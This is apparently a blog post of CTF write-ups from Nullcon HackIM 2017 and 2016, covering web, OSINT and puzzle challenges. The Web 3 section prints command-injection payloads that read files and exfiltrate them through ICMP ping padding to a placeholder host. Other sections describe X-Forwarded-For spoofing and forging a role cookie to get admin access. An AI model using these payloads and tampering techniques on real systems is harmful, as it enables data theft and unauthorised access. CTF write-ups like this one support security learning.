Nullcon HackIM 2017 CTF – Web

February 2017    Nullcon HackIM 2017

Web 1 | 100 Points

Question: Chris Martin wants to go home. Can you help him get there as soon as possible?http://54.152.19.210/web100/

Hints: There are no hint available in the question. but there are two hints provided as comment and errors.

Answer: I found a base64 hash “MmI0YjAzN2ZkMWYzMDM3NWU1Y2Q4NzE0NDhiNWI5NWM=” in source code as a HTML comment.

By decoding this I got a md5 hash and googled it !!!….Got username and password from a image. coldplay:paradise.

I entered this in login form and got some error like this “Mismatch in Host table!”. so the server is restricted with IP. In mean time I saw hint from @nullcon “There is no place like home”  lol…Its 127.0.0.1

Immediately I added X-Forwarded-For : 127.0.0.1 and got the flag.

Flag: flag{4f9361b0302d4c2f2eb1fc308587dfd6}

Web 2| 200 Points

Question: There are two kinds of people in this world. One with all the privileges and the others. Can you get the flag by eating some British biscuit?

http://54.152.19.210/web200/

Hints: British Biscuit….Cookie !!!

Answer: I created a user and logged in to the application….It was a limited user. We need to do something with the cookie as the hint was mentioning about cookie.

Cookies created by the application.

r – 351e766803d63c7ede8cb1e1c8db5e51c63fd47cff
u- 351e7668030bacc3ecaf25565435d10cc8bd094c49

In the above two cookie there is a similar string “351e766803”, by removing that I got two md5 and decryption it gives you clear understanding.

r – d63c7ede8cb1e1c8db5e51c63fd47cff – limited
u- 0bacc3ecaf25565435d10cc8bd094c49 – s4thi5h

I changed cookie value r into admin in md5 and got the admin page.

Flag : flag{bb6df1e39bd297a47ed0eeaea9cac7ee}

Web 3| 300 Points

Question: http://54.89.146.217/

Hints: CMD, Command Injection, I love my Ex. I also love Filterate.

Answer: Did some research on google using the hints and got this “Data Exfiltration via Blind OS Command Injection“,

The target is hardened with netcat, wget and CURL…The only way is ICMP ping. using that we can exfiltrate data in ICMP echo requests using the –p flag.  The –p flag allows you to specify up to 16 “pad” bytes. This is where we will store the data we want to exfiltrate.

These are the payloads I used to retrieve the flags.

cat /home/nullcon/flagpart1.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xx.xx.xx.xx; done

cat /home/nullcon/flagpart2.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xx.xx.xx.xx; done

 

In our server we need to capture traffic using tcpdump

tcpdump -A -s0 -i eth0 icmp

 

Flag: flag{0mgth4tsaniceflag}

 

Nullcon HackIM 2017 CTF – OSINT

February 2017    Nullcon HackIM 2017

OSINT 1 | 100 Points

 

Screenshot_3

Answer: Hints in questions are “I Serve”, “Clear Water”, “Fingerprint”

Clear Water is a City in Florida, First day I wasted in Google Maps as all the hints provided by them are related to google maps. I thought it may be a latitude/longitude…..I tried each and everything possibilities from google maps but no success.

 

Second day I got this tweet from @upgoingstar. He mentioned about infosec online tools and database.

Screenshot_26

 

I tried all the database including SHODAN.IO. That is the place.  ( Here we can relate the hints “I serve” with “What’s my fingerprint” ) Correct it may be a server running on Clear Water city.

Shodan.io is having city based search. It will list all the server running on the “clear water” and luckly only one server is running on clear water city. I checked the details and got the fingerprint.

Link: https://www.shodan.io/host/24.96.78.131

Screenshot_27

Flag: flag{ee:06:bb:c1:48:bc:64:bf:69:d3:ff:6f:b0:89:6a:84}

OSINT 2| 200 Points

Screenshot_1

osint200 (1)

 

Hints: “7033”, “I have a request”

We have one website and an image. I started with image content…Googled the number 7033 and got RFC 7033 webfinger protocol. In the RFC documentation page default request are mentioned (Hint: I have one request) I copied the request and tried in the target website. Boom. Got some information.

Screenshot_28 Screenshot_4

 

 

SSDEEP(523bd1e47b08cfd4d92cddcbff8e541d)
flag{ssdeep}

 

Answer: Here I trusted Google once again. I googled the hash and got this “ViCheck.ca – Malware Hash Index“.

Its a malware hash database. I searched the hash “523bd1e47b08cfd4d92cddcbff8e541d” and got ssdeep flag.

Screenshot_30

 

Flag : flag{3072:uFvAPdnvdoz91j/q2p4N1m1QmKoEe2TE4lvrNh:uFvAPdnvdoz91rq2p4rm1QdoEe2TE4l/}

 

Nullcon HackIM 2016 CTF – Programming

February 2016    Nullcon HackIM 2016

Programming 1 | 200 Points

So you reached Delhi and now the noise in your head is not allowing you to think rationally. The Nosise in your head has origin its Origin in your Stomach. And this is a big hunger. You can finish one or probably 2 Tandoori Chicken. So where can you get the best Tandoori Chicken in Delhi? This place tweeted last week that the Tandoori Chicken it servers is like never B4. You got its twitter handle?

Answer: Hints in questions are “Tandoori Chicken in Delhi”, “Twitter”, “Tandoori Chicken it servers like never before”

I directly went to twitter and searched some words like tandoori chicken and Delhi. found @AnyaHotels and the same line.

Hackim Programming 1

Flag: @anyahotels

Programming 2| 300 Points

Your simple good Deeds can save you but your GREED can kill you. This has happened before. This greedy person lived a miserable life just for the greed of gold and lust. You must know him, once you know him, you must reach his capital and next clues will be given by his famous EX-Body Guard. This file consists of few paragraphs. Each paragraph singles out one Alphabet. Scrambling those Aplphabets will help you to know the country of this Ruler. Who was this Ruler?

Text File Content: ( http://ctf.nullcon.net/prog/TheLastRuler.txt)

hackim programming 2

 

Answer: We need to singles out one alphabet from the paragraph. Initially I don’t know the meaning of “singles out” and finally come to know like we have to select the most used letter from each paragraph and I got the word aliby…by collapsing the word I got this country “Libya” and Google !!!!

Flag : Muammar Gaddafi

 

Programming 3| 300 Points

Still Hungry and unsutisfied, you are looking for more. Some more, unique un heard dishes. Then you can find one to make it your self. Its his Dish. He has his own website which is he describes as ” a social home for each of our passions”. The link to his website is on his google+ page. whats the name of his site. By the way he loves and hogs on “Onion Kheer”. Have you heard of “Onion Kheer”?

 

Answer: Simply searched the sentence on google “a social home for each of our passions”…1st result is the flag…:P

hackim programming 3

Flag: affimity.com

 

Programming 4| 400 Points

One of the NullCon vidoes talked about a marvalous Russian Gift. The Vidoe was uploaded on [May of 2015] What is the ID of that youtube video.

Answer:  Hint: “Youtube ID” …… Directly went to the nullcon youtube channel and tried all 8months before video ids and GOT FLAG !!!!!!

Screenshot_3

Flag: a4_PvN_A1ts

 

Programming 5| 500 Points

Don’t blink your Eyes, you might miss it. But the fatigue and exhaustion rules out any logic, any will to stay awake. What you need now is a slumber. Cat nap will not do. 1 is LIFE and 0 is DEAD. in this GAME OF LIFE sleep is as important food. So… catch some sleep. But Remember…In the world of 10×10 matirx, the Life exists. If you SLOTH, sleep for 7 Ticks, or 7 Generation, In the game of Life can you tell what will be the state of the world?

 

The world- 10×10

0000000000,0000000000,0001111100,0000000100,0000001000,0000010000,0000100000,0001000000,0000000000,000000000

Answer: Hint “7”, “GAME OF LIFE”

Its little bit tricky and second day only I solved this. I got the Number 7 when ordering the binary strings

hackim programming 5

and by google the “Game of Life” I got one link with Game of Life board.

http://pmav.eu/stuff/javascript-game-of-life-v3.1.1/

after enter the 7 in the board I run it seven time as the question clearly says its 7th generation.

hackim programming 5.2

I converted the points again into binary strings.

hackim programming 5 flag

Flag: 0000000000,0001100000,0001111010,0000001001,0000001010,0000000000,0000000000,0000000000,0000000000,0000000000